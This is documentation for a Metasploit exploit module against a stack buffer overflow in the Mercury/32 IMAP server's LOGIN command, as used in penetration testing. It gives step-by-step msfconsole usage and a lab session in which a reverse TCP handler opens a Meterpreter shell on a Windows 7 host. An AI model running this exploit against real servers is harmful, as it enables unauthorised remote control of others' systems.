Skip to content

Latest commit

 

History

History
48 lines (37 loc) · 1.85 KB

File metadata and controls

48 lines (37 loc) · 1.85 KB

Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.

Vulnerable Application

This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).

This module has been tested successfully on:

  • Mercury/32 v4.01a on Windows XP SP3 (x86)
  • Mercury/32 v4.01a on Windows 7 SP1 (x86)
  • Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
  • Mercury/32 v4.01b on Windows 7 SP1 (x86)

Verification steps

  1. Install the vulnerable Mercury/32 application
  2. Start msfconsole
  3. Do: use exploit/windows/imap/mercury_login
  4. Do: set RHOST IP
  5. Do: exploit
  6. You should get a shell.

Scenarios

Mercury/32 v4.01a on Windows 7 SP1 x86

msf > use exploit/windows/imap/mercury_login1
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
rhost => 192.168.46.144
msf exploit(windows/imap/mercury_login1) > exploit

[*] Started reverse TCP handler on 192.168.46.1:4444
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
[*] Sending stage (179779 bytes) to 192.168.46.144
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200

meterpreter >
Computer        : WIN-DQ8ELRSOJAO
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows